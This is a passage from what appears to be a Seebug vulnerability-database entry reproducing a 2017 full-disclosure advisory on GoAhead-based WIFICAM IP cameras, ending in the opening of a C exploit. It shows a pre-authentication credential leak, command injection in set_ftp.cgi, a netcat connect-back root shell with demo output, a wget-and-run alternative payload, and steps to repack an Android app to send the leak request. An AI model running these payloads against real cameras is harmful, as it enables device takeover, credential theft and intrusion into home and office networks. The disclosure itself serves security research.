admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................\r\n[...]\r\nuser@kali$\r\n\r\n```\r\n\r\nTo browse `.cgi` files, an attacker needs to authenticate too:\r\n\r\n```\r\nuser@kali$ wget -qO- 
'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'\r\nvar result=\"Auth Failed\";\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'\r\nvar result=\"Auth Failed\";\r\n\r\n```\r\n\r\nBut it appears access to `.ini` files are not correctly checked. The attacker can bypass the authentication by providing an empty `loginuse` and an empty `loginpas` in the URI:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less\r\n00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM.........\r\n00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n[...]\r\n\r\n```\r\n\r\nA PoC is provided:\r\n\r\n```\r\n./expl 192.168.1.107 --get-config | xxd | grep 000003\r\n\r\n00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass\r\n00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................\r\n00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................\r\n00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003c0: 0000 0000 0000 0000 
0000 6164 6d69 6e00 ..........admin.\r\n000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................\r\n000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................\r\n\r\n```\r\n\r\nThis vulnerability allows an attacker to steal credentials, FTP accounts and SMTP accounts (email).\r\n\r\n<a id=\"root-rce\"></a>\r\n\r\n## Details - Authenticated RCE as root\r\n\r\nAn RCE exists in the FTP configuration CGI. This is well documented, as shown [here](https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html) and [here](https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/), for several different camera models.\r\n\r\nThe partition `/` is mounted read-only, so modifications are not possible in this partition.\r\n\r\nThe command injection is located in `set_ftp.cgi` (see `$(ftp x.com)`):\r\n\r\n```\r\nhttp://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp x.com)ftp&dir=/&mode=PORT&upload_interval=0\r\nhttp://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin\r\n\r\n```\r\n\r\nWhen doing a tcpdump, we can see the DNS resolution for x.com:\r\n\r\n```\r\n00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. 
(23)\r\n\r\n```\r\n\r\nso, `ftp x.com` is executed.\r\n\r\nWe can use the telnetd binary to start an authenticated-less telnetd access:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'\r\nuser@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'\r\n\r\n```\r\n\r\nTesting this will give us root account on port 25/tcp:\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107 25\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\n/ # id\r\nuid=0(root) gid=0\r\n/ # uname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\n/ # mount\r\nrootfs on / type rootfs (rw)\r\n/dev/root on / type squashfs (ro,relatime)\r\n/proc on /proc type proc (rw,relatime)\r\nsysfs on /sys type sysfs (rw,relatime)\r\ntmpfs on /dev type tmpfs (rw,relatime,size=2048k)\r\ntmpfs on /tmp type tmpfs (rw,relatime,size=5120k)\r\ndevpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)\r\n/dev/mtdblock3 on /system type jffs2 (rw,relatime)\r\n/ #\r\n\r\n```\r\n\r\n`/etc` is in read-only. So, command injection must not write into `/etc`. The injection is located in `/tmp/ftpupload.sh`:\r\n\r\n```\r\n/ # cat /tmp/ftpupload.sh \r\n/bin/ftp -n<<!\r\nopen 192.168.1.1 21\r\nuser ftp $(telnetd -l /bin/sh -p 25)ftp\r\nbinary\r\nlcd /tmp\r\nput ftptest.txt\r\nclose\r\nbye\r\n!\r\n/ #\r\n\r\n```\r\n\r\n<a id=\"pre-auth-root-rce\"></a>\r\n\r\n## Details - Pre-Auth RCE as root\r\n\r\nBy combining the Pre-Auth Info Leak within the GoAhead http server vulnerability and then authenticated RCE as root, an attacker can achieve a pre-auth RCE as root on a LAN or on the Internet.\r\n\r\nAn exploit is provided and can be used to get a root RCE with connect-back.\r\n\r\nThe exploit will:\r\n\r\n1. 
extract the valid credentials by connecting to the remote GoAhead HTTP server of the targeted camera\r\n2. plant a connect-back with `nc`\r\n3. execute the payload\r\n4. the attacker will receive a root shell with netcat on a second terminal\r\n5. clean the payload located in the configuration file\r\n\r\nIt affects 1250+ camera models.\r\n\r\nDemo:\r\n\r\n```\r\nuser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107 \r\nCamera 0day root RCE with connect-back @PierreKimSec\r\n\r\nPlease run `nc -vlp 1337` on 192.168.1.1\r\n\r\n[+] bypassing auth ... done\r\n login = admin\r\n pass = admin\r\n[+] planting payload ... done\r\n[+] executing payload ... done\r\n[+] cleaning payload ... done\r\n[+] cleaning payload ... done\r\n[+] enjoy your root shell on 192.168.1.1:1337\r\nuser@kali$\r\n\r\n```\r\n\r\nOn the second xterm:\r\n\r\n```\r\nuser@kali$ nc -lvp 1337\r\nlistening on [any] 1337 ...\r\n192.168.1.107: inverse host lookup failed: Unknown host\r\nconnect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968\r\nid\r\nuid=0(root) gid=0\r\nuname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\nps \r\nPID USER TIME COMMAND\r\n 1 root 0:01 {linuxrc} init\r\n 2 root 0:00 [kthreadd]\r\n 3 root 0:00 [ksoftirqd/0]\r\n 5 root 0:00 [kworker/0:0H]\r\n 6 root 0:00 [kworker/u2:0]\r\n 7 root 0:00 [rcu_preempt]\r\n 8 root 0:00 [rcu_bh]\r\n 9 root 0:00 [rcu_sched]\r\n 10 root 0:00 [watchdog/0]\r\n 11 root 0:00 [khelper]\r\n 12 root 0:00 [writeback]\r\n 13 root 0:00 [bioset]\r\n 14 root 0:00 [kblockd]\r\n 15 root 0:00 [khubd]\r\n 16 root 0:00 [kworker/0:1]\r\n 17 root 0:00 [cfg80211]\r\n 18 root 0:00 [rpciod]\r\n 19 root 0:00 [kswapd0]\r\n 20 root 0:00 [fsnotify_mark]\r\n 21 root 0:00 [nfsiod]\r\n 22 root 0:00 [crypto]\r\n 36 root 0:00 [kworker/u2:1]\r\n 39 root 0:00 [i2s_work_1]\r\n 40 root 0:00 [i2s_codec_irq_w]\r\n 41 root 0:00 [kworker/0:2]\r\n 42 root 0:00 [deferwq]\r\n 43 root 0:00 [kworker/0:1H]\r\n 59 root 0:00 
[jffs2_gcd_mtd3]\r\n 61 root 0:00 telnetd\r\n 69 root 0:00 /system/system/bin/wifidaemon\r\n 70 root 0:00 /sbin/getty -L ttyS1 115200 vt100\r\n 98 root 0:01 [RtmpTimerTask]\r\n 99 root 0:00 [RtmpMlmeTask]\r\n 100 root 0:00 [RtmpCmdQTask]\r\n 101 root 0:00 [RtmpWscTask]\r\n 148 root 1:19 /tmp/encoder\r\n 164 root 0:00 [irq/37-isp]\r\n 236 root 0:07 [apical_isp_fw_p]\r\n 2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt\r\n 2331 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2332 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2333 root 0:00 /bin/ftp -n\r\n 2334 root 0:00 /bin/sh\r\n 2439 root 0:00 ps\r\n\r\n```\r\n\r\nDetails -- Misc - \"Cloud\" (Aka Botnet)\r\nBy default, the camera uses a 'Cloud' functionality.\r\n\r\nYou can tcpdump the traffic of the camera, which is very scary:\r\n```\r\n12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. 
(39)\r\n12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46\r\n12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28\r\n12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ A? time.nist.gov. (31)\r\n12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n```\r\n\r\nThe camera tries to resolve `www.baidu.com`, `openapi.xg.qq.com`, contacts hardcoded IPs and hosts:\r\n\r\n* `121.42.208.86:32100/udp` (CN: Alibaba),\r\n* `54.221.213.97:32100/udp` (AWS US),\r\n* `120.24.37.48:32100/udp` (CN: Alibaba),\r\n* `www.baidu.com:80/tcp` (CN: Baidu).\r\n\r\nIt appears this is the 'Cloud' functionality, enabled by default. The security of this functionality is not proven.\r\n\r\nThe provided Android application to manage my camera is [object.p2pwificam.client.apk](https://play.google.com/store/apps/details?id=object.p2pwificam.client).\r\n\r\n\r\n\r\n\r\n\r\nNetcam 360 works too:\r\n\r\n\r\n\r\nIt appears, the network protocol is very weak:\r\n\r\n1. the camera contacts a remote server using UDP,\r\n2. the application contacts a remote server using UDP,\r\n3. the application sends a request to the remote server, asking if the camera with the specific serial-number is online,\r\n4. the server will reply by \"camera doesn't exit\", \"camera is offline\" or \"camera is online\",\r\n5. 
if the camera is online, a UDP tunnel is automatically established between the application and the camera, using the Cloud server as a relay.\r\n\r\n### UDP tunnel:\r\n\r\n```\r\n[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]\r\n\r\n```\r\n\r\nThen, the UDP tunnel is used by the application to reach the camera:\r\n\r\n1/ the client will send an HTTP request to the camera with the credentials (still in clear-text)\r\n\r\n```\r\nGET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nor\r\n\r\n```\r\nGET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\n2/ the camera will reply by using HTTP over UDP, whether the credentials are valid or invalid.\r\n\r\nIf the credentials are valid, the camera will reply:\r\n\r\n```\r\nresult= 0;\r\n\r\n```\r\n\r\nIf the credentials are not valid, the camera will reply:\r\n\r\n```\r\nresult=-1\r\n\r\n```\r\n\r\n3/ if the credentials are valid, then the application will send HTTP requests to .cgi files hosted by the camera by appending credentials to the requests (`?loginuse=valid_user&loginpas=valid_pass`)\r\n\r\n### Step 2 in detail:\r\n\r\nIf the authentication is OK, the whole configuration can then be dumped in cleartext!\r\n\r\n\r\n\r\nNote: this trace was done with one of the applications listed below, to be sure applications are sharing the same \"cloud\" network (it appears the daemon running on the camera doesn't strictly respect the HTTP protocol - note the lack of `/` - but it works!).\r\n\r\nIf the authentication is not OK. 
The cameras answers:\r\n\r\n```\r\nresult=-1;\r\n\r\n```\r\n\r\nDue to the absence of checking, an attacker can simply bruteforce credentials.\r\n\r\n\r\n\r\n### Step 3 in detail:\r\n\r\nThe application sends:\r\n\r\n```\r\nGET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nOR\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nThe camera replies by sending all its configuration in clear-text:\r\n\r\n```\r\nvar now=1122211111;\r\nvar dst_enable=0;\r\nvar dst_time=0;\r\nvar tz=0;\r\nvar ntp_enable=1;\r\nvar ntp_svr=\"time.nist.gov\";\r\nvar dhcpen=1;\r\nvar ip=\"192.168.2.76\";\r\nvar mask=\"255.255.255.0\";\r\nvar gateway=\"192.168.2.1\";\r\nvar dns1=\"8.8.8.8\";\r\nvar dns2=\"192.168.2.1\";\r\nvar port=80;\r\nvar nashost=\"\";\r\nvar nasport=0;\r\nvar dev2_host=\"\";\r\nvar dev2_alias=\"\";\r\nvar dev2_user=\"\";\r\nvar dev2_pwd=\"\";\r\nvar dev2_port=0;\r\nvar dev3_host=\"\";\r\nvar dev3_alias=\"\";\r\nvar dev3_user=\"\";\r\nvar dev3_pwd=\"\";\r\nvar dev3_port=0;\r\nvar dev4_host=\"\";\r\nvar dev4_alias=\"\";\r\nvar dev4_user=\"\";\r\nvar dev4_pwd=\"\";\r\nvar dev4_port=0;\r\nvar dev5_host=\"\";\r\nvar dev5_alias=\"\";\r\nvar dev5_user=\"\";\r\nvar dev5_pwd=\"\";\r\nvar dev5_port=0;\r\nvar dev6_host=\"\";\r\nvar dev6_alias\r\n[...]\r\nvar user1_name=\"\";\r\nvar user1_pwd=\"\";\r\nvar user2_name=\"wut\";\r\nvar user2_pwd=\"wut\";\r\nvar user3_name=\"admin\";\r\nvar user3_pwd=\"admin\";\r\n[...]\r\n\r\n```\r\n\r\nThis is interesting because an attacker can reach a camera only by knowing a serial number. The UDP tunnel between the attacker and the camera is established even if the attacker doesn't know the credentials. It's useful to note the tunnel bypasses NAT and firewall, allowing the attacker to reach internal cameras (if they are connected to the Internet) and to bruteforce credentials. 
Then, the attacker can just try to bruteforce credentials of the camera:\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&\r\n\r\n```\r\n\r\nThis protocol appears to be common to a lot of Android applications, ie:\r\n\r\n* [object.p2pwificam.client](https://play.google.com/store/apps/details?id=object.p2pwificam.client) (500.000 - 1.000.000 installations)\r\n* [hsl.p2pipcam](https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000 - 500.000 installations)\r\n* [object.liouzx.client](https://play.google.com/store/apps/details?id=object.liouzx.client) (100.000 - 500.000 installations)\r\n* [object.lioupp.client](https://play.google.com/store/apps/details?id=object.lioupp.client) (100.000 - 500.000 installations)\r\n* [com.g_zhang.myp2pcam](https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam) (100.000 - 500.000 installations)\r\n* [object.aisaidezx.client](https://play.google.com/store/apps/details?id=object.aisaidezx.client) (50.000 - 100.000 installations)\r\n* [hsl.cam360](https://play.google.com/store/apps/details?id=hsl.cam360) (10.000 - 50.000 installations)\r\n* [bravocam.p2pipcam](https://play.google.com/store/apps/details?id=bravocam.p2pipcam) (10.000 - 50.000 installations)\r\n* [xcam.p2pipcam](https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [snugcam.p2pipcam](https://play.google.com/store/apps/details?id=snugcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [myview.p2pipcam](https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000 - 10.000 installations)\r\n* [object.weimaisizx.client](https://play.google.com/store/apps/details?id=object.weimaisizx.client) (10.000 - 50.000 installations)\r\n* [com.tutk.P2PCamLive.Pixord](https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord) (10.000 - 50.000 installations)\r\n* [object.p2pnetwork.client](https://play.google.com/store/apps/details?id=object.p2pnetwork.client) (5.000 
- 10.000 installations)\r\n\r\nThis list is very far from being complete.\r\n\r\nSo, I modified the original Android Application in order to try the pre-auth Info-Leak vulnerability:\r\n\r\n```\r\nk% ls -la\r\ntotal 14912\r\ndrwx------ 2 nobody nogroup 100 Mar 7 08:27 .\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\nk% ./apktool d object.p2pwificam.client.apk\r\nI: Using Apktool 2.2.2 on object.p2pwificam.client.apk\r\nI: Loading resource table...\r\nI: Decoding AndroidManifest.xml with resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nI: Loading resource table from file: /tmp/.local/share/apktool/framework/1.apk\r\nI: Regular manifest package...\r\nI: Decoding file-resources...\r\nI: Decoding values */* XMLs...\r\nI: Baksmaling classes.dex...\r\nI: Copying assets and libs...\r\nI: Copying unknown files...\r\nI: Copying original files...\r\nk%\r\n\r\n```\r\n\r\nI edit the library which manages all the custom HTTP requests.\r\n\r\nOne of the interesting string is `GET /%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`:\r\n\r\n```\r\nk% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so\r\n\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l\r\n0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user=\r\n0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect 
begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return:\r\n0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou\r\n0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con\r\n0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m\r\n0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle:\r\n\r\n```\r\n\r\nAfter the modification:\r\n\r\n```\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi\r\n0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x\r\n0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n\r\n```\r\n\r\nThen, let's repack and sign the .apk:\r\n\r\n```\r\nk% ./apktool b object.p2pwificam.client\r\nI: Using Apktool 2.2.2\r\nI: Checking whether sources has changed...\r\nI: Checking whether resources has changed...\r\nI: Building resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nW: warning: string 'conectar' has no default translation.\r\nW: warning: string 'str_ipcamfour' has no default translation.\r\nW: warning: string 'user_pwd_no_show' has no default translation.\r\nI: Copying libs... 
(/lib)\r\nI: Building apk file...\r\nI: Copying unknown files/dir...\r\nk% openssl genrsa -out key.pem\r\n\r\nGenerating RSA private key, 2048 bit long modulus\r\n..........................................+++\r\n...................................................................+++\r\nunable to write 'random state'\r\ne is 65537 (0x010001)\r\nk% openssl req -new -key key.pem -out request.pem\r\n[...]\r\nk% openssl x509 -req -days 9999 -in request.pem -signkey key.pem -out certificate.pem\r\nSignature ok\r\nsubject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd\r\nGetting Private key\r\nunable to write 'random state'\r\nk% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out key.pk8 -nocrypt\r\nk% signapk certificate.pem key.pk8 object.p2pwificam.client/dist/object.p2pwificam.client.apk signed-object.p2pwificam.client.apk\r\nk% ls -latr\r\ntotal 21560\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\ndrwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client\r\n-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem\r\n-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem\r\n-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem\r\n-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8\r\ndrwx------ 3 nobody nogroup 220 Mar 7 08:34 .\r\n-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 signed-object.p2pwificam.client.apk\r\n\r\n```\r\n\r\n`signed-object.p2pwificam.client.apk` is ready to be used.\r\n\r\nWhen using it, we see that:\r\n\r\nThe client indeed sends the `system.ini` request within the UDP tunnel:\r\n\r\n\r\n\r\nThe camera indeed receives this request within the UDP tunnel:\r\n\r\n\r\n\r\nComplete trace is:\r\n\r\n\r\n\r\nIt appears the pre-auth is not easily reachable within the cloud network.\r\n\r\nThis \"cloud\" protocol seems to 
be more a botnet protocol than a legit remote access protocol and does indeed have weaknesses (everything in clear-text, i.e. an attacker can attack cameras within the cloud and leverage potential access to hack internal networks).\r\n\r\nA lot of P2P ('Cloud') cameras are in fact using the same botnet protocols and the same infrastructure, seemingly managed by a single entity.\r\n\r\nWriting a PoC which bruteforces credentials of the remote camera is left as an exercise for the reader.\r\n\r\n## Vendor Response\r\n\r\nDue to difficulties in finding and contacting all the vendors, full-disclosure is applied.\r\n\r\n**I advise you to IMMEDIATELY DISCONNECT cameras from the Internet. Hundreds of thousands of cameras are affected by the 0day Info-Leak. Millions of them are using the insecure Cloud network.**\r\n\r\n## Report Timeline\r\n\r\n* Feb 26, 2017: Vulnerabilities found by Pierre Kim.\r\n* Mar 08, 2017: A public advisory is sent to security mailing lists.\r\n\r\n## Credits\r\n\r\nThese vulnerabilities were found by Pierre Kim ([@PierreKimSec](https://twitter.com/PierreKimSec)).\r\n\r\n## References\r\n\r\n[https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt](https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt)\r\n\r\n[https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html](https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html)\r\n\r\n## Disclaimer\r\n\r\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: [http://creativecommons.org/licenses/by-nc-sa/3.0/](http://creativecommons.org/licenses/by-nc-sa/3.0/)", "modified": "2017-03-08T00:00:00", "published": "2017-03-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92748", "id": "SSV:92748", "type": "seebug", "title": "The Wireless IP Camera (P2P) WIFICAM Multiple vulnerabilities", "sourceData": "\n #include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include 
<arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\n\r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\nchar * creds(char *argv,\r\n int get_config);\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n\r\n\r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n\r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n\r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n\r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n\r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n 
